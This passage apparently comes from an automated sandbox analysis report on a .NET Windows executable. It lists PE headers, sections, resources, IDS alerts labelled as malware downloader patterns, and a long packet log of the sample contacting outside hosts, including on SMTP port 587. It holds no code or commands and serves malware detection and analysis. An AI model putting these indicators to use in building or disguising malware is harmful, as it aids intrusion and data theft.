add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc01d0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbf000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbe224	0xbe400	12962f4d528f18b71fcc49985d03a0b5	False	0.9181188916721419	Intel ia64 COFF executable, no relocation info, stripped, 12 sections, symbol offset=0x48, 327682 symbols, optional header size 23936	7.870657597769688	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x800	0x800	e60360ebe42ec42e55a8c5cf71b0d737	False	0.337890625	data	3.471536600390886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	5849a8d67f885d19754bce5c1c434f97	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc2090	0x39c	data			0.4199134199134199
RT_MANIFEST	0xc243c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T06:16:01.972729+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-01T06:16:02.894615+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-01T06:16:03.478306+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	188.114.96.3	443	TCP
2024-10-01T06:16:04.285232+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.247.73	80	TCP
2024-10-01T06:16:07.494181+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 06:16:01.034297943 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:01.039096117 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:01.039165974 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:01.039355040 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:01.044126034 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:01.708857059 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:01.712639093 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:01.717504978 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:01.918766975 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:01.963258982 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:01.963294029 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:01.963402033 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:01.971731901 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:01.971748114 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:01.972728968 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:02.447139978 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.447273016 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.453058958 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.453075886 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.453324080 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.503983974 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.506315947 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.547409058 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.615096092 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.615161896 CEST	443	49736	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.615210056 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.619796991 CEST	49736	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.638540983 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:02.644998074 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:02.846812963 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:02.849562883 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.849586964 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.849647999 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.849977970 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:02.849991083 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:02.894614935 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.345191002 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:03.357841015 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:03.357857943 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:03.478317976 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:03.478394032 CEST	443	49737	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:03.478456020 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:03.493170023 CEST	49737	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:03.512973070 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.515237093 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.518222094 CEST	80	49734	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:03.518275976 CEST	49734	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.520060062 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:03.520119905 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.520214081 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:03.525002003 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:04.232608080 CEST	80	49738	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:04.233814955 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.233850956 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.233936071 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.234113932 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.234126091 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.285232067 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:04.689143896 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.690500021 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.690516949 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.835735083 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.835818052 CEST	443	49740	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:04.835890055 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.836245060 CEST	49740	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:04.840889931 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:04.845709085 CEST	80	49742	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:04.845825911 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:04.845953941 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:04.850689888 CEST	80	49742	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:05.514498949 CEST	80	49742	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:05.516396999 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:05.516433954 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:05.516511917 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:05.516730070 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:05.516741991 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:05.566498041 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.041203022 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.052088976 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.052107096 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.194895983 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.194976091 CEST	443	49743	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.195051908 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.195435047 CEST	49743	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.198055983 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.199024916 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.203069925 CEST	80	49742	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:06.203445911 CEST	49742	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.203830957 CEST	80	49744	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:06.203891039 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.203975916 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:06.208815098 CEST	80	49744	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:06.894727945 CEST	80	49744	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:06.895921946 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.896009922 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.896104097 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.896352053 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:06.896389961 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:06.941524029 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.349162102 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:07.350704908 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:07.350773096 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:07.494180918 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:07.494245052 CEST	443	49745	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:07.494348049 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:07.494724989 CEST	49745	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:07.497515917 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.498498917 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.502584934 CEST	80	49744	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:07.502648115 CEST	49744	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.503310919 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:07.503374100 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.503449917 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:07.508183002 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:08.177732944 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:08.178956985 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.178997993 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.179074049 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.179342031 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.179356098 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.222764969 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.665374994 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.667447090 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.667490005 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.823120117 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.823184013 CEST	443	49747	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:08.823245049 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.824018002 CEST	49747	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:08.827126980 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.828474998 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.832318068 CEST	80	49746	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:08.832397938 CEST	49746	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.833367109 CEST	80	49748	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:08.833451986 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.833524942 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:08.838362932 CEST	80	49748	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:09.497265100 CEST	80	49748	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:09.498466015 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:09.498503923 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:09.498586893 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:09.498940945 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:09.498955011 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:09.550885916 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:09.981744051 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:09.983452082 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:09.983484030 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:10.113148928 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:10.113241911 CEST	443	49749	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:10.113306046 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:10.113811970 CEST	49749	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:10.117022038 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:10.118122101 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:10.122198105 CEST	80	49748	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:10.122272968 CEST	49748	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:10.122958899 CEST	80	49750	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:10.123038054 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:10.123119116 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:10.127913952 CEST	80	49750	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:10.791599989 CEST	80	49750	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:10.792880058 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:10.792970896 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:10.793050051 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:10.793292046 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:10.793329954 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:10.832108974 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.247602940 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:11.249150991 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:11.249212027 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:11.514051914 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:11.514132977 CEST	443	49751	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:11.514216900 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:11.514744043 CEST	49751	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:11.517575979 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.518578053 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.522671938 CEST	80	49750	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:11.522722006 CEST	49750	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.523413897 CEST	80	49752	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:11.523482084 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.523566961 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:11.528345108 CEST	80	49752	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:12.258929014 CEST	80	49752	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:12.260070086 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.260108948 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.260180950 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.260425091 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.260438919 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.300887108 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:12.715358019 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.717127085 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.717150927 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.853960037 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.854038000 CEST	443	49753	188.114.96.3	192.168.2.4
Oct 1, 2024 06:16:12.854089975 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.854641914 CEST	49753	443	192.168.2.4	188.114.96.3
Oct 1, 2024 06:16:12.910928011 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:12.916178942 CEST	80	49752	132.226.247.73	192.168.2.4
Oct 1, 2024 06:16:12.916266918 CEST	49752	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:12.918580055 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:12.918623924 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:12.918689966 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:12.919090033 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:12.919106007 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.529939890 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.530070066 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:13.531711102 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:13.531722069 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.531960011 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.533667088 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:13.579416037 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.781918049 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.781980991 CEST	443	49754	149.154.167.220	192.168.2.4
Oct 1, 2024 06:16:13.782044888 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:13.786446095 CEST	49754	443	192.168.2.4	149.154.167.220
Oct 1, 2024 06:16:19.281485081 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:19.281794071 CEST	49738	80	192.168.2.4	132.226.247.73
Oct 1, 2024 06:16:19.286329031 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:19.286410093 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:19.986937046 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:19.987509966 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:19.992398024 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.154509068 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.154778004 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.159554958 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.318151951 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.324084997 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.328921080 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.515642881 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.515666008 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.515678883 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.515693903 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.515747070 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.515782118 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.521451950 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.521487951 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.521538019 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.533653021 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.538533926 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.696881056 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.702598095 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.707456112 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.866339922 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:20.867997885 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:20.872817039 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.034051895 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.034457922 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.039695978 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.221221924 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.221510887 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.226417065 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.383204937 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.383407116 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.388210058 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.577893972 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.578087091 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.583050966 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.740411997 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.741013050 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.741070986 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.741090059 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.741107941 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:21.745846987 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.745918989 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.746052980 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:21.746079922 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:22.006043911 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:22.050919056 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:23.521651983 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:23.526488066 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:23.686935902 CEST	587	49761	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:23.687839985 CEST	49761	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:23.688922882 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:23.693805933 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:23.694422007 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.371664047 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.371881008 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.376735926 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.537324905 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.537457943 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.542270899 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.701865911 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.702333927 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.707221031 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.882822990 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.882868052 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.882886887 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.882920980 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.883024931 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.883024931 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.969078064 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:24.970696926 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:24.975532055 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.133738041 CEST	587	49762	198.54.114.247	192.168.2.4
Oct 1, 2024 06:16:25.138825893 CEST	49762	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:16:25.143686056 CEST	587	49762	198.54.114.247	192.168.2.4
